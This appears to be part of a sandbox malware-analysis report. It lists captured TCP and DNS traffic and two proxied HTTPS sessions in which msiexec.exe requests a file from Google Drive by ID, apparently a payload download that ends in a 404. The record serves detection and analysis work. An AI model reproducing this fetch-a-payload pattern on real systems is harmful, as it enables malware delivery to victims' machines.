Jan 11, 2025 04:27:50.453576088 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.453653097 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.453656912 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.453680038 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.453701019 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.453722000 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.453730106 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.453742981 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.453768969 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.453783035 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.454251051 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.454271078 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.616166115 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:50.616214037 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:50.616297007 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:50.616542101 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:50.616561890 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.268863916 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.268927097 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:51.269351959 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:51.269361973 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.269489050 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:51.269493103 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.658888102 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.658957005 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.659019947 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:51.659019947 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:51.660036087 CET	50025	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:51.660053015 CET	443	50025	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:51.671261072 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:51.671298981 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:51.671452999 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:51.672192097 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:51.672202110 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.302299023 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.302602053 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.302848101 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.302855015 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.303006887 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.303010941 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.731946945 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.732016087 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.732031107 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.732057095 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.732064962 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.732080936 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.732125044 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.732151031 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.733158112 CET	50026	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:52.733180046 CET	443	50026	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:52.897687912 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:52.897736073 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:52.897866011 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:52.905059099 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:52.905078888 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.554609060 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.554683924 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.555179119 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.555183887 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.555331945 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.555335045 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.940172911 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.940258026 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.940269947 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.940396070 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.940515995 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.940538883 CET	443	50027	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:53.940547943 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.940592051 CET	50027	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:53.958029032 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:53.958085060 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:53.958156109 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:53.958376884 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:53.958398104 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:54.601689100 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:54.604943037 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:54.605350971 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:54.605359077 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:54.605556965 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:54.605561972 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:55.023622036 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:55.023718119 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:55.023746014 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:55.023777008 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:55.023794889 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:55.023807049 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:55.023869038 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:55.023869038 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:55.024586916 CET	50028	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:55.024601936 CET	443	50028	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:55.141345978 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:55.141410112 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:55.141745090 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:55.141746044 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:55.141782999 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:55.779570103 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:55.779697895 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:55.780194998 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:55.780201912 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:55.780379057 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:55.780384064 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:56.261013985 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:56.261161089 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:56.261188984 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:56.261240005 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:56.261312962 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:56.261354923 CET	443	50029	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:56.261411905 CET	50029	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:56.267503977 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:56.267553091 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:56.267616987 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:56.267848969 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:56.267860889 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:56.924200058 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:56.924856901 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:56.925052881 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:56.925052881 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:56.925066948 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:56.925082922 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.351728916 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.351792097 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.351826906 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:57.351857901 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.351872921 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:57.351898909 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:57.351903915 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.351926088 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.351938009 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:57.351967096 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:57.352566004 CET	50030	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:57.352583885 CET	443	50030	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:57.468869925 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:57.468926907 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:57.469029903 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:57.469324112 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:57.469336033 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.117891073 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.118035078 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.118978024 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.119055986 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.120719910 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.120729923 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.121117115 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.121181011 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.121545076 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.163341999 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.499541044 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.499644041 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.499684095 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.499712944 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.499816895 CET	50031	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:58.499841928 CET	443	50031	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:58.504273891 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:58.504324913 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:58.504403114 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:58.504602909 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:58.504616022 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.152775049 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.153013945 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.153539896 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.153539896 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.153546095 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.153553009 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.587368011 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.587455034 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.587510109 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.587527037 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.587542057 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.587555885 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.587570906 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.587603092 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.588191986 CET	50032	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:59.588207960 CET	443	50032	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:59.719054937 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:59.719108105 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:59.719192982 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:59.719471931 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:59.719484091 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.358460903 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.358639956 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:00.358987093 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:00.358994007 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.359148979 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:00.359153986 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.750662088 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.750747919 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.750791073 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:00.750819921 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:00.750963926 CET	50033	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:00.750984907 CET	443	50033	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:00.756278038 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:00.756320953 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:00.756396055 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:00.756609917 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:00.756622076 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.405898094 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.406075001 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.406536102 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.406553984 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.406796932 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.406805992 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.838485003 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.838552952 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.838619947 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.838630915 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.838643074 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:01.838660955 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.838701010 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.838701010 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.839859009 CET	50034	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:01.839874983 CET	443	50034	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:02.298644066 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:02.298700094 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:02.298861027 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:02.299125910 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:02.299139023 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:02.932806969 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:02.932868958 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:02.933284044 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:02.933291912 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:02.933461905 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:02.933466911 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:03.416474104 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:03.416940928 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:03.416956902 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:03.417880058 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:03.417932987 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:03.417932987 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:03.422127008 CET	50035	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:03.422149897 CET	443	50035	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:03.431157112 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:03.431210041 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:03.431452036 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:03.431684971 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:03.431696892 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.061238050 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.064963102 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:04.069169998 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:04.069196939 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.069401026 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:04.069412947 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.486546040 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.486711025 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.486810923 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:04.486841917 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.486855984 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.486897945 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:04.487755060 CET	50036	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:28:04.487782955 CET	443	50036	142.250.185.161	192.168.2.11
Jan 11, 2025 04:28:04.609819889 CET	50037	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:04.609879017 CET	443	50037	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:04.609980106 CET	50037	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:04.610234022 CET	50037	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:28:04.610254049 CET	443	50037	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:05.259604931 CET	443	50037	142.250.184.238	192.168.2.11
Jan 11, 2025 04:28:05.259687901 CET	50037	443	192.168.2.11	142.250.184.238

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:27:00.063014030 CET	56761	53	192.168.2.11	1.1.1.1
Jan 11, 2025 04:27:00.069556952 CET	53	56761	1.1.1.1	192.168.2.11
Jan 11, 2025 04:27:01.165666103 CET	61843	53	192.168.2.11	1.1.1.1
Jan 11, 2025 04:27:01.172817945 CET	53	61843	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 04:27:00.063014030 CET	192.168.2.11	1.1.1.1	0xa854	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:27:01.165666103 CET	192.168.2.11	1.1.1.1	0xd64c	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 04:25:57.426825047 CET	1.1.1.1	192.168.2.11	0xd684	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:25:57.426825047 CET	1.1.1.1	192.168.2.11	0xd684	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:27:00.069556952 CET	1.1.1.1	192.168.2.11	0xa854	No error (0)	drive.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:27:01.172817945 CET	1.1.1.1	192.168.2.11	0xd64c	No error (0)	drive.usercontent.google.com		142.250.185.161	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49980	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:00 UTC	216	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 03:27:01 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:00 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-5xV3x-VbxdS4Hu167sLJFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49981	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:01 UTC	258	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 03:27:02 UTC	2225	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT7FQZEg2Oh5_IaK8VanZKJaCivWDm8bRNIGOvZxlbqSN4CKtrZi08Wp4bh_VnEhDWYIPt5P0s Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:02 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-r2j7nHv8rBykO1328rRtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g; expires=Sun, 13-Jul-2025 03:27:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
